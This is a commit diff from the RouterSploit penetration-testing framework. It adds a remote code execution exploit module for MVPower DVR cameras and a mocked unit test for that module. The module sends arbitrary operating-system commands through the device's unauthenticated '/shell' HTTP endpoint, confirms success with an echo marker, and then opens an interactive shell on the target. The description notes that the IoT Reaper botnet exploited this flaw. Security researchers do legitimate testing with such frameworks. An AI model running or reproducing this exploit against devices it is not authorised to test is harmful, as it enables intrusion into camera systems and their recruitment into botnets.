Adding MVPower DVR Jaws RCE exploit (#414)

791b6f9d · Marcin Bury · GitHub · 2e55f7c4 · 791b6f9d · 791b6f9d
Unverified Commit 791b6f9d authored 7 years ago by Marcin Bury Committed by GitHub 7 years ago
5 changed files
--- a/routersploit/core/ssh/ssh_client.py
+++ b/routersploit/core/ssh/ssh_client.py
@@ -14,7 +14,7 @@ from routersploit.core.exploit.printer import print_error
 from routersploit.core.exploit.utils import random_text


-SSH_TIMEOUT = 30.0
+SSH_TIMEOUT = 8.0


 class SSHClient(Exploit):

--- a/routersploit/modules/exploits/cameras/mvpower/__init__.py
+++ b/routersploit/modules/exploits/cameras/mvpower/__init__.py
--- a/routersploit/modules/exploits/cameras/mvpower/dvr_jaws_rce.py
+++ b/routersploit/modules/exploits/cameras/mvpower/dvr_jaws_rce.py
+from routersploit.core.exploit import *
+from routersploit.core.http.http_client import HTTPClient
+
+
+class Exploit(HTTPClient):
+    __info__ = {
+        "name": "MVPower DVR Jaws RCE",
+        "description": "Module exploits MVPower DVR Jaws RCE vulnerability through 'shell' resource."
+                       "Successful exploitation allows remote unauthorized attacker to execute "
+                       "commands on operating system level. Vulnerablity was actively used by "
+                       "IoT Reaper botnet.",
+        "authors": (
+            "Paul Davies (UHF-Satcom)",  # initial vulnerability discovery and PoC
+            "Andrew Tierney (Pen Test Partners)",  # independent vulnerability discovery and PoC
+            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
+        ),
+        "references": (
+            "https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/",
+            "https://www.pentestpartners.com/security-blog/pwning-cctv-cameras",
+        ),
+        "devices": (
+            "MVPower model TV-7104HE firmware version 1.8.4 115215B9",
+        ),
+    }
+
+    target = OptIP("", "Target IPv4 or IPv6 address")
+    port = OptPort(80, "Target HTTP port")
+
+    def run(self):
+        if self.check():
+            print_success("Target seems to be vulnerable")
+            shell(self, architecture="armle", method="echo", location="/tmp")
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+
+    def execute(self, cmd):
+        path = "/shell?{}".format(cmd)
+        response = self.http_request(
+            method="GET",
+            path=path,
+        )
+
+        if response:
+            return response.text
+
+        return ""
+
+    @mute
+    def check(self):
+        mark = utils.random_text(16)
+        cmd = "echo {}".format(mark)
+
+        if mark in self.execute(cmd):
+            return True  # target is vulnerable
+
+        return False  # target is not vulnerable
--- a/tests/exploits/cameras/mvpower/__init__.py
+++ b/tests/exploits/cameras/mvpower/__init__.py
--- a/tests/exploits/cameras/mvpower/test_dvr_jaws_rce.py
+++ b/tests/exploits/cameras/mvpower/test_dvr_jaws_rce.py
+import re
+from unittest import mock
+from flask import request
+from routersploit.modules.exploits.cameras.mvpower.dvr_jaws_rce import Exploit
+
+
+def apply_response(*args, **kwargs):
+    cmd = request.query_string
+    res =  re.findall(b"echo%20(.+)", cmd)
+
+    if res:
+        return str(res[0], "utf-8"), 200
+
+    return "WRONG", 200
+
+
+@mock.patch("routersploit.modules.exploits.cameras.mvpower.dvr_jaws_rce.shell")
+def test_exploit_success(mocked_shell, target):
+    """ Test scenario - successful exploitation """
+
+    route_mock = target.get_route_mock("/shell", methods=["GET"])
+    route_mock.side_effect = apply_response
+
+    exploit = Exploit()
+    exploit.target = target.host
+    exploit.port = target.port
+
+    assert exploit.check()
+    assert exploit.run() is None